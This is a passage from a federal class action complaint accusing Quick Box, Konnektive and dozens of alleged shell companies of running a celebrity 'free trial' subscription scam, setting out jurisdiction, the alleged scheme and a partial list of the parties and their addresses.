**KNEUPPER & COVEY, PC**
Kevin Kneupper, Esq. (CA SBN 325413)
kevin@kneuppercovey.com
321 N. Orange St. #306
Glendale, CA 91203
Tel: 512-420-8407

*Attorneys for Plaintiff LeAnne Tan*
*and the putative Class*

UNITED STATES DISTRICT COURT

SOUTHERN DISTRICT OF CALIFORNIA

| | |
|---|---|
| LEANNE TAN, Individually and On Behalf of All Others Similarly Situated,<br><br>Plaintiff,<br><br>vs.<br><br>QUICK BOX, LLC; QUICK HOLDINGS, LLC; STEPHEN ADELE; CHAD BIGGINS; JAMES MARTELL; KONNEKTIVE LLC; KONNEKTIVE CORPORATION; MARTORANO HOLDINGS, LLC; KONNEKTIVE REWARDS, LLC; MATTHEW MARTORANO; KATHRYN MARTORANO; TOTAL HEALTH SUPPLY TUA, INC.; DL GROUP, INC.; BEAUTIFUL SKIN AND HEALTH SL, INC.; BEAUTY AND BALANCE LV, INC.; COASTAL BEAUTY CARE KV, INC.; COASTAL HEALTH & BODY TML, INC.; COASTAL SKIN CARE DC, INC.; COMPLETE BEAUTIFUL SKIN DT, INC.; COMPLETE DIETARY HEALTH DT, INC.; DIET AND BEAUTY ENTERPRISE JB, INC.; DIET FOCUS MG, INC.; DIETARY 8 LEAVES | Case No.: **'20CV1082 H    WVG**<br><br>**CLASS ACTION COMPLAINT FOR:**<br><br>(1) Violation of California's Consumer Legal Remedies Act;<br>(2) Violation of California's False Advertising Law;<br>(3) Violation of the Unfair and Fraudulent Prongs of California's Unfair Competition Law;<br>(4) Violation of the Unlawful Prong California's Unfair Competition Law;<br>(5) Violation of California's Automatic Renewal Law;<br>(6) Violation of the Electronic Fund Transfer Act;<br>(7) Civil RICO;<br>(8) Violation of Various Consumer Protection Laws;<br>(9) Aiding and Abetting;<br>(10) Conspiracy.<br><br>**DEMAND FOR JURY TRIAL** |

TL, INC.; DIETARY CARE GROUP MK, INC.; DIETARY HEALTH DL, INC.; DIETARY HEALTH MANAGEMENT SL, INC.; DIETARY HEALTH SUPPLEMENTS ADN, INC.; DIETARY MIND & BODY AR, INC.; DIETARY PILLS TTH, INC.; DIETARY SUPPLEMENTS 8 LEAVES TL, INC.; DIETARY SUPPLEMENTS NS, INC.; EM STRENGTH & WELLNESS PRODUCTS, INC.; EW IDEAL HEALTH STORE, INC.; EW RADIANT SKIN STORE, INC.; FIT AND SLIM BODY OLO, INC.; FIT BODY FOREVER KZ, INC.; FIT LIFESTYLE ENTERPRISE JD, INC.; FITNESS & HEALTH SUPPLEMENTS PKL, INC.; FLAWLESS BEAUTY FOREVER MC, INC.; FOREVER BEAUTIFUL PRODUCTS KZ, INC.;  FOREVER BEAUTY AND BALANCE JL, INC.; HEALTH & BODY CARE TN, INC.; HEALTH & SKIN NUTRITION JLN, INC.; HEALTH & WELLNESS PRODUCTS EM, INC; HEALTH AND DIET PRODUCTS ISA, INC.; HEALTH AND FITNESS LIFESTYLE JL, INC.; HEALTH ENTERPRISE AR, INC.; HEALTH ENTERPRISE LT, INC.; HEALTH SKIN AND BEAUTY MAYA, INC.; HEALTH SKIN AND BODY JB, INC.; HEALTHY AND SLIM TT, INC.; HEALTHY BEAUTIFUL SKIN JD, INC.; HEALTHY BODY & BALANCE CD, INC.; HEALTHY FIT LIFESTYLE DC, INC.; HEALTHY LEAVES TL, INC.; HEALTHY LIFESTYLE DIET JL, INC.; HEALTHY SKIN GROUP TQH, INC.; HEALTHY SKIN LIFESTYLE JB, INC.; HEALTHY SUPPLEMENTS MAYA,

INC.; IDEAL SKIN & HEALTH CARE NA, INC.; LASTING FITNESS & BEAUTY JLN, INC.; PKL EVERLASTING BEAUTY, INC.; RADIANT SKIN & BODY SHOP ATN, INC.; REMARKABLE BEAUTY TN, INC.; REMARKABLE HEALTH SUPPLY PO, INC.; SELECT SKIN PRODUCTS MV, INC.; SKIN AND BEAUTY NS, INC.; SKIN BEAUTY & HEALTH JN, INC.; SKIN BEAUTY AND BALANCE CD, INC.; SKIN BEAUTY ENTERPRISE MG, INC.; SKIN BEAUTY PRODUCTS ISA, INC.; SKIN CARE ENTERPRISE TTH, INC.; SKIN CARE GROUP MK, INC.; SKIN PRODUCTS RUBIO, INC.; STRENGTH & FITNESS LIFESTYLE LT, INC.; TOTAL FITNESS & HEALTH MC, INC.; VIBRANT FACE & BEAUTY SHOP ATN, INC. and JOHN DOES 1-10,

Defendants.

Plaintiff LeAnne Tan ("Ms. Tan" or "Plaintiff"), individually and on behalf of all others similarly situated nationwide and in the State of California, by and through the undersigned counsel, hereby files this Class Action Complaint against Defendants and allege as follows:

## JURISDICTION AND VENUE

1.     This Court has jurisdiction over this matter because this is a class action in which, on information and belief, the damages exceed $5 million, exclusive of interest and costs, the number of class members exceeds 100, and as demonstrated below, the parties are diverse pursuant to the Class Action Fairness Act of 2005 ("CAFA"), 28 U.S.C. § 1332(d). The believed scope of the damages and number of class members are based on

Plaintiff's investigation and the BBB report attached as Exhibit 1, as well as the information filed in prior lawsuits against Defendants as discussed further below.

2.      This court also has jurisdiction because Plaintiff's Electronic Fund Transfer Act claim, 15 U.S.C. § 1693e, arises under federal law.

3.      This court also has jurisdiction because Plaintiff's Racketeer Influenced and Corrupt Organizations Act ("RICO") claim, 18 U.S.C. §§ 1961, *et seq.*, arises under federal law.

4.      This Court has supplemental jurisdiction over the state law claims in this action pursuant to 28 U.S.C. § 1367.

5.      This Court has personal jurisdiction over Defendants because Defendants are authorized to conduct and do business in California, including this District. Defendants marketed, promoted, distributed, and sold their products in California, and Defendants have sufficient minimum contacts with this State and/or sufficiently availed themselves of the markets in this State through their promotion, sales, distribution, and marketing within this State, including this District, to render the exercise of jurisdiction by this Court permissible. As described in further detail herein, each Defendant purposely directed their conduct towards California residents. The Defendants named as the "La Pura Defendants" are also either California corporations or have their principle place of business in California and are thus subject to general jurisdiction in California.

6.      This Court further has personal jurisdiction over all Defendants as to the RICO claim under 28 U.S.C. § 1965(b). No other single jurisdiction will have personal jurisdiction over all of the alleged conspirators because the Defendants are located in California, Colorado, Puerto Rico, Delaware, and Georgia. The location of the John Does is currently unknown. Personal jurisdiction is appropriate as to the remaining claims under the doctrine of pendent personal jurisdiction because they arise from the same common nucleus of operative facts as the RICO claim.

7.     Venue is proper in this Court pursuant to 28 U.S.C. §§ 1391(a) and (b) because a substantial part of the events giving rise to Plaintiff's claims occurred while she resided in this judicial district, including signing up for a "free trial" of the products at issue.

## NATURE OF THE ACTION

8.     This action involves a form of fraud and cybercrime that has become increasingly common—and lucrative—across the Internet, known as the celebrity "free trial" scam. These scams entice consumers with fake celebrity and magazine endorsements, claiming that well-known celebrities have either endorsed or created a new line of cosmetics products.  The operators of these scams offer consumers a "free trial"—falsely claiming that if you just pay the shipping and handling, then you can try these amazing new products for free.

9.     But the products are anything but free. The scammers' only goal is to fraudulently obtain the victim's credit card or bank account information. And once they have it, they begin billing their victims for subscriptions they never signed up for, never agreed to, and about which they were never properly informed. Using multiple websites, the scammers present one face to the consumer—a "landing page" website offering the free trial with no disclosure of a subscription, or a disclosure buried in a terms of service on a separate page—and a completely different face to the banks investigating complaints, which is a second website appearing to fully comply with the law and fully disclose those subscriptions. However, the second website—the "false front"—is never viewed by the consumer. Instead, the consumer signs up for the fake "free trial" from a well-hidden landing page on a completely different website. Consequently, consumers are left with no recourse because the scammers have defrauded their banks into believing they consented to be billed, when in fact they did not.

10.     These scammers operate in rings, as described in Exhibit 1. Those rings generally include: (1) the marketers/branders of the products, including the scammers named as the La Pura Defendants herein, who create "free trial" landing pages to lure unwitting victims to purchase the products and also operate a "false front" website to avoid

detection by the banks and credit card companies, (2) fulfillment companies, including the QuickBox Defendants, who provide turnkey "white label" products to the marketers/branders, assist the marketers/branders with affiliate marketing and advertising, distribute the products to unwitting consumers nationwide, and handle returns when customers complain, (3) "CRM" or customer relationship management software companies, including the Konnektive Defendants, who provide specialized software for the scammers to create their "free trial" landing pages and "false front" websites and to enable them to utilize multiple merchant accounts and chargeback/re-billing screening in order to avoid fraud detection by banks and credit card companies, (4) affiliates and affiliate networks who are paid to advertise the fake celebrity and magazine endorsements, and (5) "crooked processors" who assist the scammers in avoiding detection by bank and credit card companies.

11.    These rings of scammers are structured in this way in the mistaken belief that the members of the ring will avoid liability by pretending to be legitimate businesses and pretending to have no knowledge of the actions of the others. But every member knows full well what they are doing—the marketers/branders, including the La Pura Defendants, intentionally seek out affiliates and affiliate networks to do their dirty work under the pretense of "independent contractor" agreements and operate different websites to avoid fraud detection by banks and credit card companies, the fulfillment companies, including the QuickBox Defendants, handle numerous consumer complaints for the unauthorized billing of products the consumers did not purchase, and the CRM companies, including the Konnektive Defendants, as well as  the "crooked processors" openly pitch themselves as being able to help their clients avoid fraud detection and chargebacks.

12.    Ms. Tan was a victim of these scammers—but many others have been as well. This lawsuit seeks to hold accountable the members of the conspiracy that defrauded her, defrauded her bank, and defrauded many other consumers as well.

## THE PARTIES
### Plaintiff

13.     Plaintiff LeAnne Tan is a citizen of the State of California and resides in San Diego, California, where she resided at the time of her purchase of the La Pura product. On or around January 10, 2020, she signed up for a "free trial" of one La Pura skin product with the expectation she would only be billed for the low shipping cost of $4.94. Without her knowledge or authorization, Ms. Tan's credit card was charged on two consecutive days for a subscription totaling $172.83. While Ms. Tan received a partial refund from La Pura after she complained to customer service and requested a full refund, ultimately, she was unable to recover all of the money taken from her by Defendants.

## The Defendants

14.     QUICK BOX, LLC is a limited liability company organized and existing under the laws of the State of Colorado, and its principal place of business is 11551 E. 45th Avenue, Unit C, Denver, Colorado 80239.

15.     QUICK HOLDINGS, LLC is a limited liability company organized and existing under the laws of the State of Colorado, and its principal place of business is 11551 E. 45th Avenue, Unit C, Denver, Colorado 80239. It is the owner of Quick Box LLC, and on information and belief, controls and directs Quick Box LLC's activities through its executives, including at least Stephen Adele.

16.     STEPHEN ADELE is a resident of the State of Colorado, residing at 2263 S. Loveland Street, Denver, Colorado 80228. Adele is the current Chief Executive Officer of Quick Box LLC, and on information and belief, he operates Quick Holdings LLC as well.

17.     CHAD BIGGINS is a resident of the State of Georgia, residing at 205 Carter Drive, McDonough, Georgia 30252. The QuickBox Defendants list Mr. Biggins as a member of its executive management team and co-owner, and tout his marketing experience as a reason for clients to work with them. On information and belief, Mr. Biggins directly assists clients customers of the QuickBox Defendants in running their free trial scams.

18.     JAMES MARTELL is a resident of the State of Colorado, residing at 3095 Blue Mountain Drive, Broomfield, Colorado 80023. The QuickBox Defendants list Martell

as a member of its executive management team and co-owner, along with Defendant Biggins, and tout his marketing experience as a reason for clients to work with them. On information and belief, Mr. Martell directly assists customers of the QuickBox Defendants in running their free trial scams, including through his company, Brand Innovate.

19.   KONNEKTIVE LLC is a Puerto Rico corporation, and its designated office address is 2421 Laurel Street, San Juan, PR 00913. Matthew Martorano is listed as its authorized person.

20.   KONNEKTIVE CORPORATION is a Georgia corporation with its principle place of business as 105 Hembree Park Drive, Suite A, Roswell, Georgia 30076. Its registered agent is Kathryn Martorano.

21.   MARTORANO HOLDINGS, LLC is a Puerto Rico corporation with a registered address of 1 Calle Almendro, #303, San Juan, Puerto Rico 00913. Its President and Managing Partner is Matthew Martorano. Its Secretary and Treasurer is Kathryn Martorano.

22.   KONNEKTIVE REWARDS, LLC is a Puerto Rico corporation with a registered address of 2421 Laurel Street, San Juan, Puerto Rico 00913. Its authorized agent is Matthew Martorano.

23.   MATTHEW MARTORANO is an individual residing at 1 Calle Almendro, #303, San Juan, Puerto Rico 00913. Konnektive's website lists Mr. Martorano as its co-founder, along with his wife, Defendant Kathryn Martorano. He was the CEO of Konnektive Corporation through 2019, and continues to work for the company.

24.   KATHRYN MARTORANO is an individual residing at 1 Calle Almendro, #303, San Juan, Puerto Rico 00913.  Konnektive's website lists Mrs. Martorano and her husband, Defendant Matthew Martorano, as its co-founders. She is the CEO, CFO, Secretary, and registered agent of Konnektive Corporation.

25.   TOTAL HEALTH SUPPLY TUA, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant

accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

26.   DL GROUP, INC. is a Delaware corporation registered to do business in California under the name "DL Management Group Inc." Its registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. Its principal place of business is listed with the California Secretary of State as 746 W. Huntington Dr., Unit D, Arcada, CA 91007. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

27.   BEAUTIFUL SKIN AND HEALTH SL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

28.   BEAUTY AND BALANCE LV, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

29.   COASTAL BEAUTY CARE KV, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and

evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

30.    COASTAL HEALTH & BODY TML, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

31.    COASTAL SKIN CARE DC, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

32.    COMPLETE BEAUTIFUL SKIN DT, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

33.    COMPLETE DIETARY HEALTH DT, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

34.    DIET AND BEAUTY ENTERPRISE JB, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814.

On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

35.    DIET FOCUS MG, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

36.    DIETARY 8 LEAVES TL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

37.    DIETARY CARE GROUP MK, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

38.    DIETARY HEALTH DL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

39.     DIETARY HEALTH MANAGEMENT SL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

40.     DIETARY HEALTH SUPPLEMENTS ADN, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

41.     DIETARY MIND & BODY AR, INC. is a Delaware corporation registered to do business in California. Its registered agent is Registered Agents Inc., 30 N Gould, Ste R, Sheridan, WY 82801. Its principal place of business is listed with the California Secretary of State as 126 Willis St., Suite 200, Redding, CA 96001. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

42.     DIETARY PILLS TTH, INC. is a Delaware corporation registered to do business in California. Its registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. Its principal place of business is listed with the California Secretary of State as 9350 Bolsa Ave., SPC 21, Westminster, CA 92683. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

43.    DIETARY SUPPLEMENTS 8 LEAVES TL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

44.    DIETARY SUPPLEMENTS NS, INC. is a Delaware corporation registered to do business in California. Its registered agent is Registered Agents Inc., 30 N Gould, Ste R, Sheridan, WY 82801. Its principal place of business is listed with the California Secretary of State as 4080 W. 1st St, SPC #258, Santa Ana, CA 92703. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

45.    EM STRENGTH & WELLNESS PRODUCTS, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

46.    EW IDEAL HEALTH STORE, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

47.    EW RADIANT SKIN STORE, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On

information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

48.     FIT AND SLIM BODY OLO, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

49.     FIT BODY FOREVER KZ, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

50.     FIT LIFESTYLE ENTERPRISE JD, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

51.     FITNESS & HEALTH SUPPLEMENTS PKL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

52.     FLAWLESS BEAUTY FOREVER MC, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

53.     FOREVER BEAUTIFUL PRODUCTS KZ, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

54.     FOREVER BEAUTY AND BALANCE JL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

55.     HEALTH & BODY CARE TN, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

56.     HEALTH & SKIN NUTRITION JLN, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and

evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

57.    HEALTH & WELLNESS PRODUCTS EM, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

58.    HEALTH AND DIET PRODUCTS ISA, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

59.    HEALTH AND FITNESS LIFESTYLE JL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

60.    HEALTH ENTERPRISE AR, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

61.    HEALTH ENTERPRISE LT, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On

information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

62.    HEALTH SKIN AND BEAUTY MAYA, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

63.    HEALTH SKIN AND BODY JB, INC. is a Delaware corporation registered to do business in California. Its registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. Its principal place of business is listed with the California Secretary of State as 115 S. Birch St., Santa Ana, CA 92701. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

64.    HEALTHY AND SLIM TT, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

65.    HEALTHY BEAUTIFUL SKIN JD, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and

evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

66.     HEALTHY BODY & BALANCE CD, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

67.     HEALTHY FIT LIFESTYLE DC, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

68.     HEALTHY LEAVES TL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

69.     HEALTHY LIFESTYLE DIET JL, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

70.     HEALTHY SKIN GROUP TQH, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On

information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

71.   HEALTHY SKIN LIFESTYLE JB, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

72.   HEALTHY SUPPLEMENTS MAYA, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

73.   IDEAL SKIN & HEALTH CARE NA, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

74.   LASTING FITNESS & BEAUTY JLN, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

75.     PKL EVERLASTING BEAUTY, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

76.     RADIANT SKIN & BODY SHOP ATN, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

77.     REMARKABLE BEAUTY TN, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

78.     REMARKABLE HEALTH SUPPLY PO, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

79.     SELECT SKIN PRODUCTS MV, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and

evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

80.     SKIN AND BEAUTY NS, INC. is a California corporation whose registered agent is Elinor Spector at 1017 L Street #439, Sacramento, CA 95814. On information and belief, this company is a shell entity which was used to apply for merchant accounts for the purpose of billing members of the Class, committing bank fraud, and evading detection by the fraud departments of financial institutions resulting in injury to Plaintiff and the Class.

